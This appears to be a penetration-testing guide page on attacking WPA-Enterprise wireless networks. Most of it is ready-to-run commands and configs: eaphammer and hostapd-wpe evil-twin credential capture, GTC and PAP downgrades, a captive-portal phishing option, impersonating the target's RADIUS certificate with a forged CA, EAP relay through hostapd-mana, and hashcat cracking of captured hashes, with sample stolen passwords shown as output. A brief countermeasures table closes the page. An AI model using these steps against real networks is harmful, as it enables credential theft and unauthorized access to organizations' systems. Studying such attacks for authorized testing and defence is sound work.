WPA-Enterprise Attacks
WPA-Enterprise uses 802.1X authentication (RADIUS). Common EAP types include PEAP, EAP-TLS, and EAP-TTLS. Attacks focus on capturing EAP credentials or downgrading authentication methods.
Prerequisites
- β’ Wireless adapter in monitor mode (01-Setup Guide)
- β’
hostapd-wpeoreaphammerinstalled - β’ Understanding of 802.1X authentication flow and EAP types
- β’ Self-signed certificate for rogue AP (generated by tools automatically)
- β’ Test environment with WPA-Enterprise RADIUS server (FreeRADIUS recommended)
π Table of Contents
Why Certificate Validation Matters
The most effective mitigation against these attacks is proper client-side certificate validation.
If end devices accept any certificate from the rogue AP (the most common misconfiguration),
EAP-MSCHAPv2 credentials are trivially captured and cracked offline in hours with
hashcat -m 5500.
EAP Type Overview
| EAP Type | Inner Auth | Cert Required | Attack Surface | Difficulty |
|---|---|---|---|---|
| PEAP-MSCHAPv2 | MSCHAPv2 | Server only | High β credentials capturable if cert not validated | Easy |
| EAP-TTLS/PAP | PAP (plaintext) | Server only | Critical β plaintext password in tunnel | Easy |
| EAP-TTLS/MSCHAPv2 | MSCHAPv2 | Server only | High β same as PEAP | Easy |
| EAP-TLS | Certificate | Both (mutual) | Low β requires client cert theft | Hard |
| EAP-GTC | Token/OTP | Server only | Medium β can capture tokens | Medium |
| EAP-FAST | PAC (Cisco) | Optional | Medium β Anonymous PAC provisioning = vulnerable | Medium |
Credential Capture (hostapd-wpe)
Attack Vectors
- Evil Twin with hostapd-wpe: Captures MSCHAP credentials when clients connect to a fake AP.
- Certificate Impersonation: Many clients don't properly validate server certs. hostapd-wpe generates self-signed certs.
- PEAP Downgrade: Force clients to use less secure authentication.
- Offline Dictionary Attack: Captured EAP-MSCHAPv2 can be cracked offline.
Eaphammer Advanced Usage
Eaphammer is the most capable tool for WPA-Enterprise attacks. It automates rogue AP setup, certificate generation, credential capture, and EAP downgrade attacks.
bash
# Install eaphammer
git clone https://github.com/s0lst1c3/eaphammer
cd eaphammer
./kali-setup# Install eaphammer
git clone https://github.com/s0lst1c3/eaphammer
cd eaphammer
./kali-setup bash
# Generate certificates mimicking the target organization
# This creates a cert chain that looks like "CorpWiFi RADIUS"
./eaphammer --cert-wizard
# When prompted:
# Country: US
# State: California
# Locality: San Francisco
# Organization: Target Corp IT β match target's cert if known
# Email: admin@targetcorp.com
# CN: radius.targetcorp.com β match target's CN exactly# Generate certificates mimicking the target organization
# This creates a cert chain that looks like "CorpWiFi RADIUS"
./eaphammer --cert-wizard
# When prompted:
# Country: US
# State: California
# Locality: San Francisco
# Organization: Target Corp IT β match target's cert if known
# Email: admin@targetcorp.com
# CN: radius.targetcorp.com β match target's CN exactly bash
# Basic credential capture β most common attack
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --creds
# Capture with hostile portal (phishing page after connection)
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --captive-portal
# GTC downgrade β force clients to send plaintext credentials
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --creds --negotiate gtc-downgrade
# PEAP downgrade with simultaneous deauthentication
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --creds \
--auth peap --negotiate gtc-downgrade \
--deauth-iface wlan1mon --known-beacons# Basic credential capture β most common attack
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --creds
# Capture with hostile portal (phishing page after connection)
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --captive-portal
# GTC downgrade β force clients to send plaintext credentials
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --creds --negotiate gtc-downgrade
# PEAP downgrade with simultaneous deauthentication
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --creds \
--auth peap --negotiate gtc-downgrade \
--deauth-iface wlan1mon --known-beaconsEAP Downgrade Attacks
EAP downgrade attacks exploit the negotiation process. The rogue RADIUS server offers a weaker inner authentication method. If the client supplicant accepts it (most do by default), credentials are captured in a more exploitable format.
GTC Downgrade = Plaintext Credentials
The GTC (Generic Token Card) downgrade is the most devastating attack. If a client is configured for
PEAP-MSCHAPv2 but will also accept PEAP-GTC, the rogue AP sends a GTC challenge instead.
The client responds with the plaintext password β no cracking required.
GTC Downgrade with hostapd-wpe
bash
# Edit hostapd-wpe.conf to force GTC
# Change the eap_user_file to offer GTC as first EAP method:
# /etc/hostapd-wpe/hostapd-wpe.eap_user
# Phase 1 β accept any outer method
* PEAP,TTLS
# Phase 2 β offer GTC first, then MSCHAPv2 as fallback
"t" GTC,MSCHAPV2 "t" [2]
# Run the attack
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
# Output on successful GTC capture:
# EAP-GTC: Username: john.smith
# EAP-GTC: Password: Summer2025!# Edit hostapd-wpe.conf to force GTC
# Change the eap_user_file to offer GTC as first EAP method:
# /etc/hostapd-wpe/hostapd-wpe.eap_user
# Phase 1 β accept any outer method
* PEAP,TTLS
# Phase 2 β offer GTC first, then MSCHAPv2 as fallback
"t" GTC,MSCHAPV2 "t" [2]
# Run the attack
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
# Output on successful GTC capture:
# EAP-GTC: Username: john.smith
# EAP-GTC: Password: Summer2025!EAP-TTLS/PAP Downgrade
Similar to GTC β if the client accepts EAP-TTLS, the inner authentication can be switched to PAP, which sends the password in cleartext inside the TLS tunnel (which terminates at your rogue RADIUS).
bash
# Eaphammer β TTLS/PAP downgrade
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --creds \
--auth ttls --negotiate pap
# Captured output:
# EAP-TTLS/PAP: Username: admin@corp
# EAP-TTLS/PAP: Password: P@ssw0rd123# Eaphammer β TTLS/PAP downgrade
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi --creds \
--auth ttls --negotiate pap
# Captured output:
# EAP-TTLS/PAP: Username: admin@corp
# EAP-TTLS/PAP: Password: P@ssw0rd123Identifying Downgrade Vulnerability
Before attacking, determine if the target's supplicant configuration is vulnerable to downgrade:
| OS / Supplicant | GTC Vulnerable | PAP Vulnerable | Notes |
|---|---|---|---|
| Windows (NativeSup) | No | No | Only accepts configured inner method |
| macOS / iOS | Yes | No | Accepts GTC if user clicks "Trust" |
| Android (wpa_supplicant) | Yes | Yes | Highly variable by manufacturer & version |
| Linux (NetworkManager) | Yes | Yes | Depends on supplicant config |
| ChromeOS | No | No | Enforces configured EAP method |
Certificate Impersonation
WPA-Enterprise relies on the client trusting the RADIUS server's certificate. Most enterprise deployments fail to enforce certificate pinning β clients show a prompt and the user clicks "Trust".
Reconnaissance β Extract Target Certificate
bash
# Step 1: Connect to the real network and extract the RADIUS cert
# Use a test device configured for the enterprise SSID
# Extract cert from a pcap capture
tshark -r enterprise-capture.pcap -Y "eap && tls.handshake.certificate" \
-T fields -e tls.handshake.certificate 2>/dev/null
# Or use openssl to probe if RADIUS port is directly reachable
openssl s_client -connect radius.corp.com:2083 -showcerts < /dev/null 2>/dev/null
# Step 2: Extract cert details to clone
openssl x509 -in radius-cert.pem -noout -subject -issuer -dates
# subject=CN = radius.targetcorp.com
# issuer=CN = TargetCorp Root CA
# notBefore=Jan 1 00:00:00 2024 GMT
# notAfter=Dec 31 23:59:59 2026 GMT# Step 1: Connect to the real network and extract the RADIUS cert
# Use a test device configured for the enterprise SSID
# Extract cert from a pcap capture
tshark -r enterprise-capture.pcap -Y "eap && tls.handshake.certificate" \
-T fields -e tls.handshake.certificate 2>/dev/null
# Or use openssl to probe if RADIUS port is directly reachable
openssl s_client -connect radius.corp.com:2083 -showcerts < /dev/null 2>/dev/null
# Step 2: Extract cert details to clone
openssl x509 -in radius-cert.pem -noout -subject -issuer -dates
# subject=CN = radius.targetcorp.com
# issuer=CN = TargetCorp Root CA
# notBefore=Jan 1 00:00:00 2024 GMT
# notAfter=Dec 31 23:59:59 2026 GMTClone & Deploy Impersonated Certificate
bash
# Generate a matching cert chain with eaphammer
./eaphammer --cert-wizard
# Or manually with OpenSSL:
# 1. Create fake root CA matching target's CA name
openssl req -x509 -newkey rsa:2048 -keyout fakeCA.key -out fakeCA.pem \
-days 365 -nodes -subj "/CN=TargetCorp Root CA/O=TargetCorp"
# 2. Create server cert signed by fake CA
openssl req -newkey rsa:2048 -keyout server.key -out server.csr \
-nodes -subj "/CN=radius.targetcorp.com/O=TargetCorp IT"
openssl x509 -req -in server.csr -CA fakeCA.pem -CAkey fakeCA.key \
-CAcreateserial -out server.pem -days 365
# 3. Deploy with hostapd-wpe
# Update hostapd-wpe.conf:
# ca_cert=/path/to/fakeCA.pem
# server_cert=/path/to/server.pem
# private_key=/path/to/server.key# Generate a matching cert chain with eaphammer
./eaphammer --cert-wizard
# Or manually with OpenSSL:
# 1. Create fake root CA matching target's CA name
openssl req -x509 -newkey rsa:2048 -keyout fakeCA.key -out fakeCA.pem \
-days 365 -nodes -subj "/CN=TargetCorp Root CA/O=TargetCorp"
# 2. Create server cert signed by fake CA
openssl req -newkey rsa:2048 -keyout server.key -out server.csr \
-nodes -subj "/CN=radius.targetcorp.com/O=TargetCorp IT"
openssl x509 -req -in server.csr -CA fakeCA.pem -CAkey fakeCA.key \
-CAcreateserial -out server.pem -days 365
# 3. Deploy with hostapd-wpe
# Update hostapd-wpe.conf:
# ca_cert=/path/to/fakeCA.pem
# server_cert=/path/to/server.pem
# private_key=/path/to/server.keyRADIUS Relay & EAP Relay
EAP relay attacks bypass credential cracking entirely. Instead of capturing and cracking the hash, the attacker relays the live EAP authentication between the victim client and the real RADIUS server β authenticating as the victim without knowing their password.
Most Dangerous Enterprise Attack
EAP relay defeats MSCHAPv2 hash cracking complexity entirely. Even a 40-character password is relayed
verbatim. The only defense is mutual certificate validation (EAP-TLS) or 802.1X RADIUS attribute
checking (Calling-Station-Id MAC binding).
Attack Architecture
text
# EAP Relay attack flow:
#
# [Victim Client] ββWiFiββ [Rogue AP (attacker)] ββWired/VPNββ [Real RADIUS Server]
# β
# Relays EAP frames
# bidirectionally
# β
# Attacker gets a valid
# session on the real network
#
# Requirements:
# 1. Rogue AP on same SSID as target
# 2. Network path from rogue AP to legitimate RADIUS server
# 3. Client that doesn't validate server certificates
# 4. wpa_supplicant or hostapd-mana configured for relay# EAP Relay attack flow:
#
# [Victim Client] ββWiFiββ [Rogue AP (attacker)] ββWired/VPNββ [Real RADIUS Server]
# β
# Relays EAP frames
# bidirectionally
# β
# Attacker gets a valid
# session on the real network
#
# Requirements:
# 1. Rogue AP on same SSID as target
# 2. Network path from rogue AP to legitimate RADIUS server
# 3. Client that doesn't validate server certificates
# 4. wpa_supplicant or hostapd-mana configured for relayEAP Relay with hostapd-mana
bash
# Install hostapd-mana (fork with relay support)
git clone https://github.com/sensepost/hostapd-mana
cd hostapd-mana
make
# Configure relay in hostapd-mana.conf
interface=wlan0
ssid=CorpWiFi
channel=6
wpa=2
wpa_key_mgmt=WPA-EAP
ieee8021x=1
# Relay settings β forward EAP to real RADIUS
mana_wpe=1
mana_eapsuccess=1
mana_credout=/tmp/creds.txt
# RADIUS relay target
auth_server_addr=10.0.0.1 # Real RADIUS server IP
auth_server_port=1812
auth_server_shared_secret=testing123
# Launch relay
sudo ./hostapd-mana hostapd-mana.conf# Install hostapd-mana (fork with relay support)
git clone https://github.com/sensepost/hostapd-mana
cd hostapd-mana
make
# Configure relay in hostapd-mana.conf
interface=wlan0
ssid=CorpWiFi
channel=6
wpa=2
wpa_key_mgmt=WPA-EAP
ieee8021x=1
# Relay settings β forward EAP to real RADIUS
mana_wpe=1
mana_eapsuccess=1
mana_credout=/tmp/creds.txt
# RADIUS relay target
auth_server_addr=10.0.0.1 # Real RADIUS server IP
auth_server_port=1812
auth_server_shared_secret=testing123
# Launch relay
sudo ./hostapd-mana hostapd-mana.confEAPHammer Relay Mode
bash
# Eaphammer includes built-in relay capability
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi \
--creds --auth peap \
--radius-server 10.0.0.1 --radius-port 1812 --radius-secret testing123# Eaphammer includes built-in relay capability
./eaphammer -i wlan0 --channel 6 --essid CorpWiFi \
--creds --auth peap \
--radius-server 10.0.0.1 --radius-port 1812 --radius-secret testing123Cracking MSCHAP Hashes
Crack captured MSCHAP hashes (Format: username::::response:challenge) using Hashcat mode 5500.
bash
# Basic dictionary attack
hashcat -m 5500 hashes.txt /usr/share/wordlists/rockyou.txt
# With rules for better coverage
hashcat -m 5500 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Enterprise passwords are often stronger β use targeted wordlists
# Company name + year + special chars pattern
hashcat -m 5500 hashes.txt -a 3 'CorpName?d?d?d?d?s'
# NTLMv1 (if captured via --negotiate ntlmv1-downgrade)
# Submit to crack.sh for instant plaintext via rainbow table
# https://crack.sh/get-hierarchical/ (free service for NTLMv1-SSP)# Basic dictionary attack
hashcat -m 5500 hashes.txt /usr/share/wordlists/rockyou.txt
# With rules for better coverage
hashcat -m 5500 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Enterprise passwords are often stronger β use targeted wordlists
# Company name + year + special chars pattern
hashcat -m 5500 hashes.txt -a 3 'CorpName?d?d?d?d?s'
# NTLMv1 (if captured via --negotiate ntlmv1-downgrade)
# Submit to crack.sh for instant plaintext via rainbow table
# https://crack.sh/get-hierarchical/ (free service for NTLMv1-SSP)Defensive Countermeasures
| Defense | Prevents | Implementation |
|---|---|---|
| Certificate pinning (MDM) | Evil twin, cert impersonation | Deploy RADIUS CA via MDM profile β Intune, JAMF, Workspace ONE |
| EAP-TLS (mutual cert) | All credential capture, relay | Issue client certs via PKI β strongest protection |
| Server name constraint | Cert impersonation | Configure supplicant to check CN/SAN matches expected RADIUS |
| RADIUS MAC binding | Relay attacks | Verify Calling-Station-Id matches registered device MACs |
| Lock inner EAP method | GTC/PAP downgrade | GPO/MDM: force PEAP-MSCHAPv2 only, reject alternatives |
| WIDS/WIPS | Rogue AP detection | Cisco CleanAir, Aruba WIDS, Kismet alerting |